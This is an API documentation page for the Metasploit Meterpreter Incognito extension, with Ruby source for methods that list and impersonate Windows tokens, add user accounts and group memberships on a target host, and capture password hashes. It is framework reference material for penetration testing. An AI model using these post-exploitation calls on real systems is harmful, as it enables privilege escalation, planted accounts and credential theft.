Class: Rex::Post::Meterpreter::Extensions::Incognito::Incognito

Inherits:
Rex::Post::Meterpreter::Extension show all
Defined in:
lib/rex/post/meterpreter/extensions/incognito/incognito.rb

Overview

This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#name

Instance Method Summary collapse

Constructor Details

#initialize(client) ⇒ Incognito

Returns a new instance of Incognito.



22
23
24
25
26
27
28
29
30
31
32
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 22

def initialize(client)
	super(client, 'incognito')

	client.register_extension_aliases(
		[
			{
				'name' => 'incognito',
				'ext'  => self
			},
		])
end

Instance Method Details

#incognito_add_group_user(host, groupname, username) ⇒ Object



65
66
67
68
69
70
71
72
73
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 65

def incognito_add_group_user(host, groupname, username)
	request = Packet.create_request('incognito_add_group_user')
	request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
	request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
	request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
	response = client.send_request(request)

	response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_add_localgroup_user(host, groupname, username) ⇒ Object



75
76
77
78
79
80
81
82
83
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 75

def incognito_add_localgroup_user(host, groupname, username)
	request = Packet.create_request('incognito_add_localgroup_user')
	request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
	request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
	request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
	response = client.send_request(request)

	response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_add_user(host, username, password) ⇒ Object



55
56
57
58
59
60
61
62
63
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 55

def incognito_add_user(host, username, password)
	request = Packet.create_request('incognito_add_user')
	request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
	request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
	request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
	response = client.send_request(request)

	response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_impersonate_token(username) ⇒ Object



47
48
49
50
51
52
53
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 47

def incognito_impersonate_token(username)
	request = Packet.create_request('incognito_impersonate_token')
	request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
	response = client.send_request(request)

	response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
end

#incognito_list_tokens(token_order) ⇒ Object



35
36
37
38
39
40
41
42
43
44
45
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 35

def incognito_list_tokens(token_order)
	request = Packet.create_request('incognito_list_tokens')
	request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)

	response = client.send_request(request)

	return {
		'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
		'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
	}
end

#incognito_snarf_hashes(host) ⇒ Object



85
86
87
88
89
90
91
# File 'lib/rex/post/meterpreter/extensions/incognito/incognito.rb', line 85

def incognito_snarf_hashes(host)
	request = Packet.create_request('incognito_snarf_hashes')
	request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
	response = client.send_request(request)

	return true
end